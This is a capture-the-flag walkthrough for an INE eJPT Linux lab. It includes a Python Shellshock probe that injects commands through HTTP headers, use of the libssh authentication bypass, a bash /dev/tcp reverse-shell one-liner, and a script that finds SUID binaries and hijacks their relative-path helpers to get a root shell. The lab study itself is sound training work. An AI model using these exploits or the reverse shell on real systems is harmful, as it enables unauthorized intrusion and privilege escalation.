Walkthrough : Host & Network Penetration Testing: System-Host Based Attacks CTF 2 (INE - eJPT)
Continuing on with my eJPT certification, this time we’ll tackle the second CTF in the System-Host Based Attacks course.
In this lab we're provided with two machines, target-1 and target-2, and we have four flags to capture:
- Flag 1: Check the root ('/') directory for a file that might hold the key to the first flag on target1.ine.local.
- Flag 2: In the server's root directory, there might be something hidden. Explore '/opt/apache/htdocs/' carefully to find the next flag on target1.ine.local.
- Flag 3: Investigate the user's home directory and consider using 'libssh_auth_bypass' to uncover the flag on target2.ine.local.
- Flag 4: The most restricted areas often hold the most valuable secrets. Look into the '/root' directory to find the hidden flag on target2.ine.local.
These are Linux machines (we're in the Linux section of the course), so let's start by going after the first and second flags together, since both live on target1.
Flag 1 & 2
Tradition dictates starting with a service-detection nmap scan, even though we already know we'll mostly be targeting an Apache server on the first machine.
The assumption is confirmed: it is an Apache httpd running on a Linux host.
Did you notice the address bar?
We spot a .cgi script. That makes Shellshock (CVE-2014-6271) the obvious thing to try: mod_cgi copies request headers into the script's environment, and a vulnerable bash executes whatever follows a function definition ("() { ...") found in an environment variable. For that we'll use the Metasploit module exploit/multi/http/apache_mod_cgi_bash_env_exec, which plants the payload in a request header and catches the resulting session.
Note: you can check out my post about the Shellshock vulnerability; I think it will get you more familiar with it.
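The module does all of this for you, but the request it sends is worth seeing by hand. The Python script below is an added example of mine, not code from the post or from Metasploit: it plants a random marker in the User-Agent header of a GET for the CGI script and reports the command output only if that marker shows up in the response body, which rules out false positives from pages that happen to contain something that looks like command output. The hostname, port, the /cgi-bin/... path and the /usr/bin/id command are placeholders to be replaced with what the address bar and the nmap scan gave you.

```python
"""Manual Shellshock (CVE-2014-6271) probe against an Apache mod_cgi script.

Added example, not code from the post or from Metasploit's
apache_mod_cgi_bash_env_exec. Host, port, CGI path and command are
placeholders for the lab values.

mod_cgi copies request headers into the CGI's environment (User-Agent
becomes HTTP_USER_AGENT). A vulnerable bash treats any variable whose
value starts with "() {" as a function definition and keeps executing
what follows the closing brace, so the command runs as the web server
user as soon as the CGI handler spawns bash.
"""
import socket
import subprocess
import uuid
from typing import Optional


def shellshock_header(cmd: str, marker: str) -> str:
    """Header value carrying the payload. The Content-Type line and the blank
    line are emitted first so Apache accepts the output as a valid CGI
    response and the marker plus command output land in the HTTP body."""
    return f"() {{ :; }}; echo Content-Type: text/plain; echo; echo {marker}; {cmd}"


def build_request(host: str, path: str, cmd: str, marker: str,
                  header: str = "User-Agent") -> bytes:
    """Raw HTTP/1.1 GET with the payload in `header` (Referer and Cookie work too)."""
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",
        f"{header}: {shellshock_header(cmd, marker)}",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


def parse_probe(response: bytes, marker: str) -> Optional[str]:
    """Command output that followed the marker in the body, or None if the
    marker never came back (not vulnerable, header not passed, bash patched)."""
    head, sep, body = response.partition(b"\r\n\r\n")
    if not sep:
        return None
    idx = body.find(marker.encode())
    if idx < 0:
        return None
    return body[idx + len(marker):].strip().decode(errors="replace")


def probe(host: str, port: int, path: str, cmd: str = "/usr/bin/id",
          timeout: float = 5.0) -> Optional[str]:
    """Send one probe; use absolute paths in `cmd`, the CGI PATH is minimal."""
    # A fresh marker per probe, so a cached or static page can never be
    # mistaken for a hit.
    marker = "SHOCK" + uuid.uuid4().hex
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(host, path, cmd, marker))
        try:
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    return parse_probe(b"".join(chunks), marker)


def local_bash_vulnerable(bash: str = "/bin/bash") -> bool:
    """The same trick against a local bash: export a function-looking variable
    and see whether the trailing command runs. Patched versions only import
    functions from BASH_FUNC_name%% variables and ignore this one."""
    env = {"PATH": "/usr/bin:/bin", "probe": "() { :; }; echo VULNERABLE"}
    out = subprocess.run([bash, "-c", "echo ok"], env=env,
                         capture_output=True, text=True)
    return "VULNERABLE" in out.stdout


if __name__ == "__main__":
    # Placeholder target; replace with the host and .cgi path from the lab.
    print(probe("target1.ine.local", 80, "/cgi-bin/test.cgi"))
```

A None result means the marker never came back: either bash is patched, the header is not passed through to the environment, or the path is not actually handled by mod_cgi. A returned `uid=...` string tells you both that the box is vulnerable and which user the web server runs as, which is the user the Metasploit session will land you in.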
Flag 3
Without wasting any time, let's start on the second machine, with, of course, another service scan.
We find a libssh instance running on the server, and we're told to use 'libssh_auth_bypass' in Metasploit (auxiliary/scanner/ssh/libssh_auth_bypass) to try and access the machine. The module targets CVE-2018-10933: a libssh server of version 0.6 up to 0.7.5 or 0.8.3 accepts a client-sent SSH2_MSG_USERAUTH_SUCCESS message and treats the session as authenticated, so no credentials are needed at all.
I set the module's ACTION to Execute and used it to navigate to the user's home directory, as instructed. There we found the third flag.
Notice that the welcome file in that directory has the SUID bit set.
Flag 4
To capture the last flag, I set up a netcat listener and used the Execute action of 'libssh_auth_bypass' to spawn a reverse TCP shell back to it with:
bash -i >& /dev/tcp/172.16.116.1/1234 0>&1
We get a reverse shell on the machine as the user 'user'.
Remember the welcome file? Let's see if we can exploit it to elevate our privileges.
strings welcome
The strings output shows that welcome refers to a greetings file by name, so it presumably runs greetings from the current directory while holding root privileges. If we replace greetings with something that gives us a shell, that shell inherits the privileges and we get access to the /root directory. One caveat: bash resets an effective uid that differs from the real uid unless started with -p, so this only hands us root if welcome switches its real uid to 0 before running greetings; if the shell you land in is not root, check id and invoke bash with -p instead.
rm greetings
cp /bin/bash greetings
./welcome
And we got access to the root account, great! Let’s capture the last flag.
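The rm/cp/./welcome sequence works because welcome is a SUID-root program that starts greetings by a name resolved from the working directory, and that pattern is worth hunting for on any box, not only where the hint points. The script below is an added example of mine, not from the post: it reproduces the manual steps (spot the SUID bit, run strings, pick out the bare program names that resolve through the cwd or PATH) over a whole tree, and the hijack helper does the rm + cp step. The fake binary in the usage note is constructed; the default payload /bin/bash and the PATH variant are assumptions about how the helper is invoked.

```python
"""Hunt for SUID binaries that launch helpers by relative name.

Added example, not part of the original post. Reproduces the manual steps
(find the SUID bit, run strings, look for a bare program name) so they can
be applied to every SUID file on a box instead of only the one the lab
points at. Paths and payload are placeholders.
"""
import os
import re
import shutil
import stat
from typing import Iterator, List, Optional

# Roughly what `strings` prints by default: runs of 4+ printable ASCII bytes.
PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")
# A bare program name (no directory part), e.g. "greetings" or "cat".
BARE_NAME = re.compile(r"^[A-Za-z0-9_.-]+$")
# Pseudo filesystems that hang os.walk or lie about modes.
PRUNE = ("/proc", "/sys", "/dev")


def find_suid(root: str = "/") -> Iterator[str]:
    """Yield regular files under `root` with the set-uid bit (find / -perm -4000)."""
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PRUNE]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entry
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path


def strings(path: str) -> List[str]:
    """Printable strings in a binary, like the `strings` command."""
    with open(path, "rb") as f:
        data = f.read()
    return [m.group().decode("ascii") for m in PRINTABLE.finditer(data)]


def relative_helpers(path: str, cwd: Optional[str] = None) -> List[str]:
    """Strings in `path` naming a program that resolves via the working
    directory or PATH rather than by absolute path. A SUID binary that runs
    such a name (system("greetings"), execvp("greetings", ...), "./greetings")
    can be hijacked by whoever controls that directory or PATH."""
    cwd = cwd or os.getcwd()
    hits = []
    for s in strings(path):
        candidate = s[2:] if s.startswith("./") else s
        if not BARE_NAME.match(candidate):
            continue
        # Keep only names that actually resolve to something, which filters
        # out most symbol names and message text.
        in_cwd = os.path.isfile(os.path.join(cwd, candidate))
        if in_cwd or shutil.which(candidate):
            hits.append(s)
    return hits


def hijack(directory: str, name: str, payload: str = "/bin/bash") -> str:
    """Replace `directory/name` with a copy of `payload` (the post's rm + cp
    step) and make it executable. Returns the path written."""
    target = os.path.join(directory, name)
    if os.path.lexists(target):
        os.remove(target)
    shutil.copy2(payload, target)
    os.chmod(target, 0o755)
    return target


if __name__ == "__main__":
    # Walk the whole box and print every SUID binary with its suspicious names.
    for suid in find_suid("/"):
        helpers = relative_helpers(suid)
        if helpers:
            print(suid, "->", ", ".join(helpers))
```

Run from the directory the SUID program expects (the user's home here), then `hijack(".", "greetings")` followed by `./welcome` is exactly the three commands above. If the helper is invoked as a bare name through system() or execvp(), the lookup goes through PATH rather than the working directory, so the variant is to put the copy in a directory you own and prepend that directory to PATH before running the SUID binary.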
And that’s it, we’ve captured all flags.
Conclusion
Well, that was once again a very easy CTF, but I enjoyed solving it.